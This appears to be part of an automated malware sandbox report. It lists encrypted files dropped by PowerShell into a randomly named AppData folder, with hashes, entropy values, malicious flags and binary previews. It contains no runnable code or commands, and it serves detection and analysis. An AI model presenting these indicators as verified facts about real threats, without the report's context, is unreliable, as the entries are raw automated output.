Preview:	.f.m0I.2...'9.hV.n.>&'!Al..(C./"....t...i...X.n./r"E.D..O8d..R.0..RK...R..&....&t...x.~s..R..u...df.y......_p\|.D.....m{.....5n.B\..S.....e.\|....:..6.3.p.FG...e.'J...-.b....+....'..M).iqp..D.LU..L...fOD.2.......=.........O.P....D..>O....~V.?=K.m.D{.Ihtt.P..A..D.C..9.N.QD...Z.....S..l=..[9!,<.....+..._?.._.RL..e.7..Z.^...$..3.....H.^.sh.j...i...8..1..4!.e...+8.O....J.pn.l].'..1...... ..}GYl.>.j.c..@.8Q.......0\..&j...C...-.$.-.x......<d.s.w.l..<...!.:.H\Cm/..R.#..\|V..U..?`N.(dp...P.gG.9.....O......1.%.`.=.....]8..4..^q.R..3u...<...l........l...h.)..!.Pv..Y..>g.5M@..p..OJ...i...K(g...9..lU!.K(....b.5X._.......?.q......(.4..N.....1k..f_.e..U:..kc..[.Y.].vV6.4....#..&sE].M.@.(.R.n.dc.{..@.(.1..H0.(e=9..~........J.k..al.s2541....}?j.4.f..x.'..;....m..c.M.8.~K.8...]@....S..4.^..~.,....Xl+-.LeJ..`...f.M..B.o%.W5.B...+...`c....,......T..G...#."...\.b.......+W.)......S.....X.V..rM....8S...f...5.....x[....x.MA.nH.U.-R .G.}.;....D,...$....sU

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\fjZizcUWapTEobM.FLMJIgnwsqodxkZXHzW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	58603
Entropy (8bit):	7.996850205643274
Encrypted:	true
SSDEEP:	768:K0FeNmDFbMlG/tkytkimoU7YzJ+Vndn35Dz3aJiPqZazcke2I3m5QkbUgb45WpOM:KI1DuctvkirULVZ5z3aJ3374sBRiGidL
MD5:	B28958E2004FC00FB40F0066A21D7E25
SHA1:	41C63A54B295549F9A852E5D52942C3DFF416022
SHA-256:	DDE86913391226690E84C74F5D0F7B9A3888199426483418D8583A2A7A3B4A25
SHA-512:	1BA2F97D2684B1A6263654CF18B0727EA95E34E627F480477E973330BC243D5F06038F1D05771B8C0E4B3C38EACAE650480ED4D34324A9590757D49F9F31FDF0
Malicious:	true
Reputation:	unknown
Preview:	C.2LN .....@...5...........TQ....Kn.IGA...L..MC4.Q.[....'3N..T.lda........]........B,~..j ..y....t....d.#...",@.R...@.~.%..e:..e...+.....EZ=`b..P...x 3.c#].3..e.:.....=.....@'....#...\......k%Pl.;j\..@9x"..._..B.M<5.L].;..b...r...M...#....>W...W..7......>..M.'u^..{YD..R..h.....}_.".@...WM.X......7..l%.Gnn.0.....<(g.jDO.N.q4.+........#{'6...-9.....N.`.......RSP6.....G.(....C..q0..J.`..=...".j8.Xl.3..L....2...+."Sd..l..W..H..l.$.>1]....w...U.....W..V...<.'.....sU...&!.e...w.V.Q....?...f......9....6 ...d.Hw=[.98~.ng...0w.....=.7..^n....K@y)q...a..hiW....^...7:#$=....x..j\.NH....r..T.X.O..0w.?.L.4.QlS...O[....H=.qW...J[.&..RwH....:...@h..j...y..w...8k..q..._....J....l...w....1....;..3\|.~]p.1V;4. ..(.B!.&}q.3.._.{...2....F.W.qg.h1.'.q...;..<.Y...\|.F..:$2...&.nH.p..^.Fi.3.N....&..]~^P....q.0d.<."W,5Ny...._....uy.1.G.[.fl[Z...%.:pJ..b..Kd.f2=gT..\|Kk..o...\..p9...:{.5M..pV4....h.[..M...kW.z,+....../ n.....*U.e.............).v%.FlEz:`Q.qU..Y1......0.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gFzDjOEGlsCdY.hWVZaMxwgeBEyrPsb Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	153784
Entropy (8bit):	7.998777936676004
Encrypted:	true
SSDEEP:	3072:mi+subOD+HPIEykL58yJRgJhvZh4OD97CnpRU2IM2e1Bzd7h:mMubOD+vIi+yJRgJNZzJCnU28e1BR9
MD5:	6BB6FF934331A4F1456DE7FCF76763D6
SHA1:	416EB03823664F40FEDEB9A0F93767CF438ABE0A
SHA-256:	00B84D957E35C628D2C4E904CCC2E40FFAEEDE3DD76F67191666F912B8D6C4BD
SHA-512:	34A532899DB1769D977C9E794B962B5AA8A0F6C236459C2902E6E1AA5EE6DB5ED0822A8A61551D615ECAA1527B8BB69CF5A822650F01DA5DCAA65A2DBA19A216
Malicious:	true
Reputation:	unknown
Preview:	M..p..k>)F......-....,...........l..K...]C.G?Q.4._... .)...#.w..\c^....t..E[.J..Hph%.L{.vR.J:3Q^~.fO...~7..z.o.<.......mlY-.:......Z..K8.v..Jq..lJ..NNl..X.3C.<..M..slH.Pm.l.o...=H}..l.L..e(...:._.......L...I.).9......[..8xo1....c.G{.i.HL...\..Yz.....m.kYh...8..R.C.8T.\L..IH....S..e..^..#k~...g).f7..B..T".... .D._...s(1A.g......4...9.h.D.g...Z..NRa]...z.o@.......h....).u..F.T.`-.p...(..'.R...5....ovU3.eN.(...i.p...>A........%z.\|<.=.P.qmo~.f...-..14q..W...g$xX..4...D.v..7?...g....%...F..I.&..!.a....d.i. i...~.0....k4.-..&..fa.........J.f..................B...3..S..B!.`..M..\...f..D....;.$....o...+.b.=.....\|B....;J....;..:B.L.....{A..7...K3.......\|...yu.:e.u.E.Q!O.#.\...`V..x.@r..g?...O.$.1..!.....k.omN...}.!5A..6......8.b0r.c2.<:yg..g.737..U>..y...%.......J%...<>?jf\....f.4.x.2u3S..:...........:)`.....Cs.<..n.t..w.<....dNz........\#RL!DW.~;.....U.nn...?..Rp..Z=..!.T.Y..s.s(5..%..Z.[.p.]S..D4$.n...m.aS..%w..Y.JU6."N?\|7p#.K...O+..&O...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gHDhkuyGOvTQoX.UOMfVLgnkrsZih Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	145579
Entropy (8bit):	7.998740646340602
Encrypted:	true
SSDEEP:	3072:qALm7SpfvzjMEUY5Qg2mBOLXUYtzXmJQWCWti5co9sV018K:qAiepjFqg26OjdzX2QWCaYOVBK
MD5:	52564C54AB94EB97920BA33C3CABD5AC
SHA1:	B0E316128FFBB44E94251DAE331DA6EFC33E4648
SHA-256:	FD7F28500518C289213656BAD5F0C2E5B2BE811C5B8896BEABD0A0991ACE2BE4
SHA-512:	164F054F97E77B82FE806A7D4B3C29329B6742F7CEA8440C87708C18959198997889029BC7E6B033AB955A64CC730ADBAD8889B2CFBE9222A8FD6BBB05854F0D
Malicious:	true
Reputation:	unknown
Preview:	<..LW>.`...(....^...?...H..D..$.?....\.L.....%z..sW.....4}..1e..P...'.#3....k..........M..z.<.L6...a.3.C.Y.R...T...}'.d....4.....;9....Z..J6..ro..^z.)....W.gN....{K..b.i.c.Ej.``cXm.<...}..P......_)]..i.z6.....H_(u.T.0..W.....b}...7.A...]..lfP..).E..O.~..Oz\|.......Y..#.FL...c........,..Y..[f.J....\|.......[.g.is."N.X,d..}f.N?.....w...y..j.jl.9...(2...By.e..z.'QSK...n..+h...].,.[}~..~a5'....t...{..!T.].4..v....yj.A...Y.-..#.C:..:)`zdJ~.G..a.U...UBw{.`V@.m`nt....G.....b.V.#..?.?......u6.u...p....,...m.3..-~..5!....xM.{~.....B._...&/V.g_.h....N...EG....(t).;...s.{.......$<(....>.fJ......5}-...?..u+..Xn.%.k......W]...l..\.2.R..>;]......C.^..z.=[.~.K$.....w....U..z......j/....V....n....*..B.%.h.m....k..Y6."....BwO....Rr..X.D,c...a.c..iq.?...........K<N...G..8!..Y..='.ji.2..a.KR..Z.'.........O.2. ..Y..........6......qa..g...E]n.2UX..U.S..4..NWQ.NL..4.HS.k'...3.<.W...bqH?.-U%.9Y&.....G.....`...'g..t.8.7..W...Q...".j....Aw...,-.K9...%.+......

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gIULYZbAhBmOFcf.faUVqPkpOHEKeid Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	57792
Entropy (8bit):	7.996823235909078
Encrypted:	true
SSDEEP:	1536:tzjY4snwKMUfc47heCMsYvn3fYjcDlw/H7RFk:xLswgzadQjcDyv7RFk
MD5:	6A3AA9C5217F9379C8476D7DC38B181D
SHA1:	6A641294830FB682A9DC17363C4A931BE8B7376C
SHA-256:	CE778565E8B6FE8BF997365E7DAD39543FBD2461425F42F0783A87AFB21BC702
SHA-512:	7B9759CBF040275BF489F76CF09D72D80E2CB633AB48279666B12D7E547E21FDF1CEB75953427E0359683EDEA46969607D0C2D89A22587757BF3F6590F3D253C
Malicious:	true
Reputation:	unknown
Preview:	C <u.3").<$..Q...".ow.V..j..!........M.C..\|P.O$..`..6...?m`.J...A..:.h^S.+...#..&1....Cb-Z.nx..t...l........,.IE.$...Lp...~.2...>..,..)..;6<.(Y..~/.t..ly..c.........,Z.B.d.OE./]........0.r..&.2..G.$...fq.3..3{..S.A..7.B(.C>..s]..Oq"[B\|...{yr....H.0...l.C'...>.K...0..7.....".?..M....y.T..<<.'2a...I............)..!).zD.........f......v...O..6.)..7.3.H.......LC..G]..XY...0.X..x.o.d^...d...>......P.....3.-W.q..E{.6.?.....#Cw..YZ..[..n..k...`._..R...]..V.m.k....RU.a..#ln9..'O.6.w..,b.U.?.......E..Bn#../....nn>.l).Q..Tn%./.......x.w.%...9......UU..........4.}..7.!.6../G5.^.....c..w..S.e..o)..o..F.....~.>...."..w\|.....)o.V.h..;:.g........kP#M..s....;...6.(..._yz..9}^....@.LxF....wMl..c.@....]\....=n.......h..LEb.z(&u.94......#u9.......(_F..g..$......F..9.Dq.m.c...M....]...w~r..ZZ.S..\|._...R.T..Rz....Ij&.....Vo..u..^.I1. c...4.+.J.G.i.dfr...Z....8..t..)..l...._%...b..?g....$..b...I.e.@...N..&dq..o..%..C..,...1...O\."...R..Ast..w..o...!..:

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\gJPRGvcenZtzVNH.dzQCVhBDSPAsrYK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	166771
Entropy (8bit):	7.998872487440059
Encrypted:	true
SSDEEP:	3072:NPlQmrFfQeMS63KKw/Ct/jKklb4CJxM6rOJzoRkS5ZWij1jnbiH+q+/6vroCFshb:VN2NS63Nw/dGcCJxM6roIL5Z9EZ+iomi
MD5:	58EA82E3A2B65E9904B9A4D93B7CEB19
SHA1:	3274C89E8B0E46F3699B683243354A8C1D1494C7
SHA-256:	AC6D71D751170B33C84277E6124E212DC1A18EEE713686B66C5259E4BFB22CCE
SHA-512:	1B41DEA93E05CC95AF6E326282A56EB141443A4D599B1FC6CB8F660D9A875233DBC0956C08E538AA3E7B7E9632D9AE61F8AF436EF5AE8489543FEE595ECA44E1
Malicious:	true
Reputation:	unknown
Preview:	E....8.^f.W`.<..j.n.D...$.V.G.....G.e...\|..Jr.%.e..]..&.;.BG...ll:._..:.,."..a. 1...../.!.).}t...B.7;..`d11.p..."..;.a...>..R1......z.j....cex..O.Z^.]...-......z...eUn>.\.S.s.$..T.X.+..~ME.....\|......6..Y..z.h..(!&.... ......%...Q..j....%......$o#.g.....jBi.n}.G.6.[-....]..&lU......+.\|..BI.e..:....+.D<.........w./5d.!).x...]2A..+u.... ..0k....Q6........C&..b6../.gc@.....O.....]..3kT..U....4n............of...V...K..85..+...D.!).3.9.u..m.W...^..t.C.s....R.+...K".R...]....c<&8wE....b5...Ap._}.i4.j.[..e%=N+.g..Jb...#.....N....4.....~.....2X..#G......W.n..T..K.L.zOi".....)..e..l!..B.P...d}d.....G.^a$Zo'......y..S...).Y8.!..%..!..M...o..).............).8.......1+...6.}X.,....b._.#@..D7.a,..N.S..I9l..&.2.....e%.^....;^.uP....H...)o.......5x.{...E.....r5..:..T.+..a...^3......<....:.,b`.&..z.F[L1..e.3u..oH.8K.K2.Q.J...*Y...{~..X.G.4..8$.....OH....N..;.H..w........X......W...H.......L...'..O....L.-q......8...@7...d].....I...),./...{q.i.Mq

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\hIpelZfQuvJKWUOLoVD.zKwVBHqpsmJnh Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	112471
Entropy (8bit):	7.998512828629316
Encrypted:	true
SSDEEP:	3072:1PM5JhgmQsr89TXjZJ1X+s+HJj/D+/okbQo8PA:1PMm1sgXjZJJ+Tlk0oyA
MD5:	FDC5CF6D316B778D947695448EAF9E92
SHA1:	088F1AA0731D27112D6F376BF2ED57D58120894D
SHA-256:	B7AD2B78A251BE60BA0E96B4ED41549D4A7604DC5AD7B982E164898F7B14B579
SHA-512:	84C871D636C84688EF254D24B3B36093533BDA42BD4995011FC6C7CE11544CCECF29CEE823BDA04B655B93D590ABDD91DEC5727A40C94C4A179EE0FF76BC2B5C
Malicious:	true
Reputation:	unknown
Preview:	...m.X....w..O.O..S.N.4qDK.....RS....n7..h@}.kPu.>....r...o......C/..$W.......mN}...k.#...9.xM.{<..'....K.9#J..6.r.Z....KY..m^.6.y.&c\.. ..f..3.WD.x..t.G........O.....A......ug..m#.,...~.}`..yk.....r..}.~.T2.-..5...".z.R.%..BD.X#.qFavM=T2..L.P.8}....{<.4...<....QF..0........7..q.)..BB..P...r9.b........y...dgwZ."F'P.....\|.?.v.......-q.(..=..].P...$....F>E.....t[..kx...i0).?.C.........,...t#.(.z.21...>..c.C...Wo"......k.....^. ..V..w....^&....c....~#.....Ug..8...G>....hZ.0PO..0~N.yp.SM?.s.z......n...}...C.....&..B....w......@..~q..S.z..7.4;J.....v...s....s.....Uq....'...WG..A}.a.b...Dj<.S.5....Y`..o.h.>ra..2s.F$:\..&qY.^w$A......m..Wm.r!>...b.~....3...N...zQ.GS.@F.Q.... Y.PGE#>...9e........C:"R.Q^n.M.cm...V..j_\|..2..G..J.$.).Vn../"^......l.H...hn.^...v...-&..y.V....T7M&..fW.S"......V8.:.ls..pj-..5Kg.......a.O.X..[..-...Z.....8..}.be..#.g=Ws..._...5H.,.7....)..%.3..7.rR.2...JP".'.GbO8.7.If-]?..#iJ.......&6 ..D..=.{.QL..(.[.[.'.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\hSMvoYKqblcIsB.LDFlagUrGbzYqhT Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	170316
Entropy (8bit):	7.998966422654355
Encrypted:	true
SSDEEP:	3072:u2S8jQfV8/sKoiuvIz8kxn3n5nD4nZqGMEeJNeOzhPGgSYeuvF34WgeuA/0:RifW/oiMKp535ncn5sJN3zp11euvFzg7
MD5:	1EB813C8524316FD6BC07728244598DF
SHA1:	D10C457522BDDB776A39F77D47A03EF5441046DE
SHA-256:	15AF1235BA88910E6C5CA5081FA3C93ED0428DD4B4CA53B752C0AFBF7FB16991
SHA-512:	B543C8826CDBFFC11C4500705704B9E06B0688E8A3157BA7DDE9B27032CC835961D047CC7270013C4C9AD0C03AE4C10A7CA0696EFAAF576C3279EF67E8621CD2
Malicious:	true
Reputation:	unknown
Preview:	..a..{..5...`d........L...;.......p.y.J..SN.B.H.6cbd/....#m0W.G\.'K.<...C....BNN.#mC2#.j.[.U0.Vy...t..IMD (.......3$..h......).....3..H#...../Ei..m"T....".L.W.x.D..C....<...U..?..:.F..G.N.j.....<...7T....{.^.M{:........(...aj^.^..U.-........2.H{....,X..-.b...n.......0(.......!.-.;...M.!r...c-....Mv2A.`.#.X...A..Q2..7.z.~...X.E..l.\.5.z....H...y/..L.4".1~zy...m....P..3.kEdT..\|d.".5 B(xs....B...%?....k.L.mI.....$7.Q. .o.3.)DMy...6k..}.9..Sj..\.....G.8.".p..h..9]m.[.e...0...Z.+.{.3#9.{.J..M.a.#.6...\++p.T....[y..M.#.....P.L......e...&O.5.p....pZ...Af.r...O..i.jE.ZQn86......UC..q#..)..^..p.j.&w.....L\....M.E.=.e.G..1:P.f.d&.4.`.>:31%..!...E..2..,.....0..^-..U..}...3b........1m.....Yl.7?g.Mu8...0/...]?.:".e.L.f.L.,.b...#...4sf......>YL..IP.7......`k...D.z..J_8j.......CMz...A.O.d.id...S...r....,.o...K...F...(...X.~.v."..t..L....&...<....Tr..X].Lg.].`./....'.~....q......@i....".A..&..I...[...(#.....3..W....h..=..R..+Y....1My.l.[ r../.U..W..._.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\iNjusWYLgHQSK.NvGTqDQOFZABdkCho Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	130440
Entropy (8bit):	7.998646558220985
Encrypted:	true
SSDEEP:	3072:hSJ9s3kjyEbqeKtaugg11+jQDq/eatbRAqIdR4tr74C2XWAq6m:h+9wkGReD82cWtbGqMR4tr74zmAq6m
MD5:	367D65D56CFFDC70CD2818827942DF4C
SHA1:	B577FD777E69A9AC55A0235DC2A6AC3B6A8312D0
SHA-256:	FAB99DAC059F69B7590C6B331AEED92C4D2F6208BB2D70ED98CC7735841255AF
SHA-512:	A54D58610E929FEF5CEDB8D987D5C307A8962CAF638FC32C3B279111CF993FA60D0C14B5B175841B70E1D7714A455B5717D8052E38EEF30F3B4453897A61C0DE
Malicious:	true
Reputation:	unknown
Preview:	.l...h.r..`..+n0.....Z...."..8.6.Y.N.P-...K......6s..TX.SXi..Z..8]....w-....x..z...........2.....D.Y...F.!.d.....X{.......&.i.=..i.4....CC.IW....keXAw,.....>....[...9d.eb..s~"h.Q.l....@..f..R..:l.2....{......\.......u.#.`..b .'.......7....7-.^..hO$XU...{..(..b...5....o'mv2.U.Y...`...o.o.T`Sb.n..xER..p.H&rj'g..6Fd< 9.o ....wOd[_}Qz>.$&..z^..K..y1.g.1.:Wwi........%...tq...N..s...... ..1....`....8OT}.q.d.o....$..352..L!.OVnnE.s...#...d.B..O(....cg.l.s.3.....E~BZ...S\{.-./<.YOA.h.BP. v..J.LO...h.....>.D.a.9...b...F...M..`...H.....8.[...p...b."...N....c...R.M.X...4..X.$...b..W....q.n@w..;.fCC...~..Enm.o.;@.9...Z....CP.6...2.......j.5<.....n.,...:..7._.?...z...\|."......S....2(...!)b~... .8...jH.`e-,...1..].....w. ....yh.8.A..w.tg;.MlY.......@N...?..........z<_.R....y..-..t...(..S.K......G..6m.......Q...=w}...R........T... 4u#.........k..C...{..s.'.K.o....T.....q.}..%.A.2Oe'.6#.0O..<.:....f@.....p......=.Z.... .m.........._.[.W...2.k

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\jAelrPOcypkTZfVtKq.bzurWBenlEjhHI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	70968
Entropy (8bit):	7.997423303595872
Encrypted:	true
SSDEEP:	1536:mjFytD11Z0ST7Rbgy43K3FS2zxX8Mnb2DN/qiFrGb6o2:mjFOldgy43KVSB15P
MD5:	68ADC67BB0C44A7DA9EE9C85E18539DA
SHA1:	8F536C9F2E17307D3797372D57B6C41F1210D73C
SHA-256:	29F933560AC517AFA7E465D20F764FAD5CE2CE5EE5EFF80F7B5E81062B6348A7
SHA-512:	BA5F8374007226C2C8E3A6F121C5DE8C406E47B9FE663E342DE0BA3E4D43A96E4A5C7BE0B4331D464181280BC236B72CD27C27BE834800C438F2F3EB9424D91A
Malicious:	true
Reputation:	unknown
Preview:	...+m...rw.Y..B......l.!.))..s[L.;6...E........R.k.E...17K..rJ..?...?.........._.l.'..f...u.Z....o+...SEi^........8.......<'m..R.4smUXYf..A....n3.=...R..6....Dw..<k......!=.'.vZ....h:..Ku#O..V..9.a......K.U.....c...PJ...7l<.._...'....N.........fF.....)Qu.h.V[....3.n.8.KJa..5.r......_..E..^..8....zq.B%<3@....C...;...j.u... ....z.#V:wo......e>W..=+...O."o.C..72.?=..z\{U@...g.e..k.j....\.V...o&...)...H..9.0.Z.....D.0.r....8.xA........@...,#....\Q..~.Q...[...N.....#..[.q..%F-..&Z8F..I.....9.XzD.].'.#...4.p....(6j..].,y.R.7.....q...Q.@...?..ixb.[.]...E.../...-..).T.g........@.......Q.D....3.;.L.v.#.....Q.t..P.<..V....[....9.{..2"..@..t.]J8.^...!.....Vg.HY..9.J.T..'..d...#.^..........,.R..#Q....(WH.LN\|..C]..].A....nz..W.}.06.T#.cD.D....i...iDv.3.K.....o.G....^p.h.tX.......v9. ......OD.y.[/Lr.I.{...K...n../...Z}t..%..Z.....}...C?b.....KTJ.Pb..{.M{.~..>..M[{.$..)....\|D.5.5dK.....)..E...6..}%...v..v.T......N_y.g........E.....wg...F*U._....%V...l

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\jBctwbJUYQs.WMefKBPGVhZkQ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	142788
Entropy (8bit):	7.998612898207954
Encrypted:	true
SSDEEP:	3072:W3Cp0LzmRzo7YF76X3Ti+7AcOCfAJU5uU9QlAdgVJpJNypfkaQoi:xpAzYo7at+FOgWU8U9xiJXuka+
MD5:	FE984A3D6CFAF6583DD3A2B5ACE3A1CC
SHA1:	0F01DE64BA326AF7CDC07F52646518124F17C247
SHA-256:	7A12E4234C1C5F3700EBD49FF114D0EF972F6C5D85B0EFD8240A2519519901F7
SHA-512:	E2F62747D7B3A98B1BBBD52C4EFF669F32C79FE09CF401F14A48E0717688CBDF151689AC112A228F13B3D28EE8770E8C13E235D206E0E51371E56CF79DB98FDC
Malicious:	true
Reputation:	unknown
Preview:	<.>......P....^k.>.yp.T...yH....J..g)f+S.M.br..4.......Z...k.<.....E..?}c...:.)..l...xS..K..j.5#..\".?..H.B.t.D.....4^\|3tS....^x.5K..W-%.....\~...>dM........85..s~...7K..W.rk?.....C..eM_.D@.yW.,....eZ....).:~...{...Hn1.1T.b..O.?.9.FW&O9..<.%eI(....B8p..4..^.......+.$.w.......9..u...52" c..b.)...=....}..(./$b.+..9....n..+..".H5<]...l.Ft...4.,.7A,l......Qb..F.......0....e...#[..5...B...F..9:.&/...<...?..S?.%..R.R..q.y.9.R+.O...S....]...c.t.#G........L.~..MzJ..uR...@...../.2.c.7`.b.....ZW..._..O&>...O.L.w.r..u..aAT.,.n...^.....r/..#.t<.qs.n.~.x`......9.>.....F.....W.\.8.q..%........5N.....8...........$a..M...,.......j.8(...>...3..gI..=.u."..........sC..R%....3..d...-...?...5...6T../.P...W.b.Rj..2.g..H3........kH\o.Rx.Cd.[`9%...."......".:MF......$sT..n..P..(u.5...Z..u.m..C...P'......}..%.wZqr.P.+....+.P..j.a...........H.;K^..:.....^A..8.$o..n..I]....q_..!Mj.y..gu.qa..n....v.{...a.#......]." .m...T..#2.S6'.....<..Rfr.I..f..U.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\kCtiGUmnopSWIj.sPnFvYKkTy Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	76644
Entropy (8bit):	7.997365149157881
Encrypted:	true
SSDEEP:	1536:nlmsAA6C35uRkuL5Nez0d1UjDMh7IRoLIFVcYcBm:TAPdkU2Q4oWRoQ1
MD5:	5363F2539AE3CAE112C5A77F251C3166
SHA1:	85BC07E2EC5CA190266350224CA86CF786FAC9BB
SHA-256:	71AEC8985504B7D17017DF1CA13E1DF92819CE9F198D44E7A2F4F95D3B9FC4F4
SHA-512:	09F5F3D9EF060FBA4A9D182CFA25AF2D1F79C24E0409A3C5E8D3F682DDD80B530DD6CE60FAABE32610DFE0B2779D043C5CBA3662074A83686ACFEF7995B14847
Malicious:	false
Reputation:	unknown
Preview:	.l..==..a.z.v`\..V.K.8(.........>.P...?..%.4Q.z......4..'5.......TNjO.%".X....Jjt........]y.5;.....Q.#.....\|.c>6.ut.....f4..F..]"'....Q..0..p>`.CC........\|..o#...;Gg..#.).....F.O...[.Y.....X....Q.$....o/!...6..l.../.Z{..N._....o!.sbB^?....n.r.S...VB\|`.%S..P.nO/..S........yW..].......V.....b.?...I@..A...u....9.4i@.......G..%..A....U.\.Of9W....(V.m...55..o.~...?.-?....D+...F....sC.$........VU.^.d.wG..f......o....V.6M...CD^<. ..W,...R;...D..8.C..J@.....V"....WC..]o.~n.....\..:...1)v...."......v...s..v.Z.6M^.@..W[.5.L.....7....D.J..Y...n........K... LA#.w....S..>EH.H.4..%..3.....c......<....?$.L.tm=._.m...rD..m<m-a@9.^..'...\..\.8.....K....Je.g....X..xG.]..6Eu\?.5.y)......W.#~.dM...)..F;.pX....G\.X..[j..e..\".(.;j.....}....Lz...e...D..C.5.s...P...[....... .gI...~ql...i.1..\|.w./.........u..m...^...p.u....V.7.....}. 9j.....M>.FY..)J...+......9.a........OD.l.. ..Y.B..m........7....>.m..c.ai....mabx........:...;..F.0.1...d.'..#...p.p..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\nEleDMXqtZLfOixgpcV.qFyHzLUwvWShiaDsen Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	101504
Entropy (8bit):	7.9981520467186
Encrypted:	true
SSDEEP:	3072:dqZrJ8e/9ts8m8RYPBKrPW6AcRkW/5eaX+A:dE8a5yPBKSKR/CA
MD5:	8CCA09868D214BA4912BFD07132EC53C
SHA1:	3DF8070D40A85856B8BF46451EEDD0A8EB3CB455
SHA-256:	A8D0EAC12576856DAA2041BAAB0D9111E1F999E576C7E2CA03344FFDB10017F7
SHA-512:	9211B3D6A92FE27BC81AA736F88108671ACA2D7D6E259712E62A60101A39C626E5167CD28AC595C81C11B278C133BD8DF351FBAD9EA160C56AF7ACCCB508B6BF
Malicious:	false
Reputation:	unknown
Preview:	.....q...y.V+...n.Pw.-.&E.....}......-....]d...P..^..q.&....Z..8@..I+Y\B..$....o..P.@Q..rJ.N/.y.. .........j.Pj.&}..b._.....`.!.....i..KG..[3."..'.u....[&..-.A...pl\.i.N.k.-w..0L.....=....V..B.t/.r.jHh.x~.h....h..z/f.{'......n.a.D<.wX.(eb.8...t7CQ..A.w.L.....K.........e.....zC.......FK..d...\3ly2.}2.N.._ .......z.2@....:..z..t..rz:~..+....5.n..F..}V......u~<o.4.s?K.Y.*.......l..!...&.dA._.......zU..NSy.Y.~.U.....,....:...^M...3F........R.l.%..,a.m.V......!o....x..K.Sx.!.]...Z..ani\|,.3.t..0:q.".\.$.....e)4/].\...n..K[.1.=.t.K_.~...T`..]... .....g.SN.-.x=~...w.7...8...Fs..^7...mmW..{x.H.........P..Tx...t.F.A...Z..v.P:;J.+.s).B.......L..s....!t..;$o..dP..s.KJ^.:$tK(X.....:...p.D.U4.j..e..m(P.y..(v'....#..s.idv......._!..z.;=.>]G]..~.4a.z..p...5....G....o..W......gJ..P..:D.,.%............,.di.i..J.0.......C....l..d....]\|.r...Xu=zo........Z.]..LC.#....C<...[.@>........]...Qi.b.5....o{.X.0Q....y.8io........1.B......!.^.=-l......V.N...1

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\nYDKWzcTsrJBCR.kCEpvMLRXgUJSo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	144128
Entropy (8bit):	7.998701428259724
Encrypted:	true
SSDEEP:	3072:RTbYp7UyWBiFvY0gweOr8Uxp+MOZG67N/MhVQnQQ2h:RTbYp7UyWmJgwfr81MO867NwiQQM
MD5:	875117350654755BF575A42760CC5BEA
SHA1:	F319BDBDD83A6DFF2664C054DE29D9A7A7202830
SHA-256:	1626195E6E0567EDEDA0D24642C771683643B2EC0E5FFEB8343F22C3DF1456F5
SHA-512:	2404C4A27DF58095B637910871BD8DA56C2336F18F97EDEB397CD9F80257AF90533BBE5E3381ADC6E80105F801A8D45E743A3E0E7A7CAF2B13E69E7165F264CC
Malicious:	true
Reputation:	unknown
Preview:	..3.....39..?...r.}..[...j..x..h.3..[i\|...>+.6.c..6c.;.Z..wG.e(:k..D.\|.........6......\|..U.c)3..k.s.it-W.z=......T..s.....n.R..^sx....B..Y?)..xRLU.P...W..yQ...6.j...B.\.D..d...K.F.....Q-.)K../..dX....a..v...i...T.F.:.y.k...~5.'(.As4.2k..IB.-......u.......g.Q@.m..Vg..\|.K87.>/E.dZ3.J..c......N)..\>^9k.&.O.Ii!...P....v..../.....!..$.j...0.#.n@..:F..-#...U8D....,3y....E..YQl...^>S..J..D.n._.....(-...'...0^..%f.Q5y...Q.M.0...W...1e...6.{.}.....w.x........h...Xp.4R.'..>X. ....y...xUc....1k:$.............m..._.t.....+^.#.4.Xr.Ud.....6.$.?k.Z.....(.ek.uE......h++&6.!:.g.)..o...7..v} C.q)O..<.M..fQi.<..n.r.....f.f.....~...B...JQ....x..~p.......).s...9.Z...u....<.TL!>s..2... o..}...>./L.p..,.>.D.Dc'.{h.3.k.M..n....%......i..Z{...8.`.D.&7xZ...\>(....Y2...cY....:`.azK<..a...........=..0.P-.z..I....r._.#u.C...o../#@X0......4Rfe ...9v.......B..G.l&t{..c&G.."..m...X. 